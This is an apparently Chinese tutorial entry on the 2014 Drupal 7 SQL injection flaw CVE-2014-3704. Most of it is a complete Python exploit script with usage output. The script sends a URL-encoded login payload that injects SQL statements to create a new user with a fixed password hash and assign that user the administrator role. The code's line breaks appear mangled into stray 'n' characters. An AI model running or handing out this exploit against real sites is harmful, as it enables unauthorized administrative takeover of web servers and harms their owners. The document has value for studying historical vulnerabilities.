用例4: CVE-2014-3704

CVE-2014-3704

Drupal在2014年10月15日宣布修復了一處SQL注入漏洞。漏洞的具體分析可以查看這裡.下面這段代碼是通過Python編寫的一段代碼來實現一個SQL注入的功能,這個腳本正確執行之後會添加一個新的管理員用戶:

腳本調用語法,需要你輸入你要創建的帳戶名和密碼:

~$ python cve-2014-3704.py <URL>n[+] Attempting CVE-2014-3704 Drupal 7.x SQLinUsername to add: admin_usernAccount created with user: admin_user and password: passwordn

代碼示例:

#!/usr/bin/pythonnimport sys, urllib2 # 導入需要的模塊nnif len(sys.argv) != 2: # 檢查輸入的格式是否正確"<script> <URL>"n print "Usage: "+sys.argv[0]+" [URL]"n sys.exit(0)nnURL=sys.argv[1] # 輸出測試的URLnprint "[+] Attempting CVE-2014-3704 Drupal 7.x SQLi"nuser=raw_input("Username to add: ") # 獲取輸入的username和passwordnnHost = URL.split(/)[2] # 從URL解析主機名: http://<host>/ 並且賦值給Host <host>nnheaders = { # 定義響應頭部nn Host: Host,n User-Agent: Mozilla,n Connection: keep-alive}nn#提交的格式化後的SQL:nn# insert into users (uid, name, pass, mail, status) select max(uid)+1, "+user+", [password_hash], email@gmail.com, 1 from users; insert into users_roles (uid, rid) VALUES ((select uid from users where name="+user+"), (select rid from role where name = administrator)nndata = "name%5b0%20%3binsert%20into%20users%20%28uid%2c%20name%2c%20pass%2c%20mail%2c%20status%29%20select%20max%28uid%29%2b1%2c%20%27"+user+"%27%2c%20%27%24S%24$S$CTo9G7Lx27gCe3dTBYhLhZOTqtJrlc7n31BjHl/aWgfK82GIACiTExGY3A9yrK1l3DdUONFFv8xV8SH9wr4r23HJauz47c/%27%2c%20%27email%40gmail.com%27%2c%201%20from%20users%3b%20insert%20into%20users_roles%20%28uid%2c%20rid%29%20VALUES%20%28%28select%20uid%20from%20users%20where%20name%3d%27"+user+"%27%29%2c%20%28select%20rid%20from%20role%20where%20name%20%3d%20%27administrator%27%29%29%3b%3b%20%23%20%5d=zRGAcKznoV&name%5b0%5d=aYxxuroJbo&pass=lGiEbjpEGm&form_build_id=form-5gCSidRr8NruKFEYt3eunbFEhLCfJaGuqGAnu80Vv0M&form_id=user_login_block&op=Log%20in"nreq = urllib2.Request(URL+"?q=node&destination=node", data, headers)nntry: # 使用Try/Except處理響應信息nn response = urllib2.urlopen(req) # 發起請求n print "Account created with user: "+user+" and password: password"nexcept Exception as e: print en

推薦閱讀：